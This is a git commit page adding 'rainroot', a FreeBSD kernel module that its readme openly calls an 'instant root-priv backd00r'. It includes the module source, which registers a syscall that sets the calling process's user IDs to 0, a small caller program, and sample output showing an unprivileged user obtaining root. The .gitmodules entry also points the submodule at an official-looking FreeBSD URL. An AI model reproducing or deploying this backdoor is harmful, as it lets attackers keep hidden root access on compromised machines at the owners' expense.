dash/FreeBSD
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add rainroot

Browse Source
This commit is contained in:
your-favorite-hacker
2015-06-01 21:04:51 +02:00
parent 19d7d5ab03
commit 094b73988e
5 changed files with 116 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
.gitmodules vendored
View File

@@ -1,3 +1,6 @@
[submodule "execwatch"] [submodule "execwatch"]
path = execwatch path = execwatch
url = https://github.com/your-favorite-hacker/FreeBSD/execwatch url = https://github.com/your-favorite-hacker/FreeBSD/execwatch
[submodule "rainroot"]
path = rainroot
url = https://github.com/FreeBSD/rainroot

8
rainroot/Makefile Executable file
View File

@@ -0,0 +1,8 @@
# Makefile for building the sample syscall module
# $FreeBSD: src/share/examples/kld/syscall/module/Makefile,v 1.2 2001/09/18 12:03:42 ru Exp $
KMOD= rainroot
SRCS= vnode_if.h\
rainroot.c
.include <bsd.kmod.mk>

15
rainroot/caller.c Normal file
View File

@@ -0,0 +1,15 @@
/* yes, this code will segfault if you dont give it an argument */
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <stdlib.h>
int main(int argc, char *argv[]){
int scall=-1;
scall = atoi(argv[1]);
syscall(scall);
return(0);
}

60
rainroot/rainroot.c Executable file
View File

@@ -0,0 +1,60 @@
/*
instant r00t :)
ancient code, time to publish
by -
*/
#include <sys/types.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/imgact.h>
#include <sys/linker.h>
#include <sys/libkern.h>
#include <sys/sysproto.h>
/*
* The function for implementing the syscall.
*/
static int
gimme_rude (struct thread *td, void *arg)
{
td->td_proc->p_ucred->cr_uid=0;
td->td_proc->p_ucred->cr_ruid=0;
td->td_proc->p_ucred->cr_uid=0;
td->td_proc->p_ucred->cr_uid=0;
return 0;
}
static struct sysent gimme_rude_sysent = {
0, /* sy_narg */
gimme_rude /* sy_call */
};
static int offset = NO_SYSCALL;
static int
load (struct module *module, int cmd, void *arg)
{
int error = 0;
switch (cmd) {
case MOD_LOAD :
printf ("call me at %d\n", offset);
break;
case MOD_UNLOAD :
printf ("call me at %d\n", offset);
break;
default :
error = EOPNOTSUPP;
break;
}
return error;
}
SYSCALL_MODULE(syscall, &offset, &gimme_rude_sysent, load, NULL);

30
rainroot/readme.txt Normal file
View File

@@ -0,0 +1,30 @@
rainr00t
========
instant root-priv backd00r via kernelland anyone?
well this module, once loaded gives the thread/user calling instantly root, without spawning an extra
shell or alike.
usage
-----
root@crashb0x:~/gainroot # uname -a
FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
root@crashb0x:~/gainroot # kldload ./rainroot.ko
root@crashb0x:~/gainroot # kldstat
Id Refs Address Size Name
1 3 0xffffffff80200000 1755658 kernel
3 1 0xffffffff81a12000 20e rainroot.ko
# userland tool, to call the newly loaded syscall (normally its syscall 210)
l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller
l00ser@crashb0x:/tmp % ./caller 211
l00ser@crashb0x:/tmp % id
uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
author
------
dash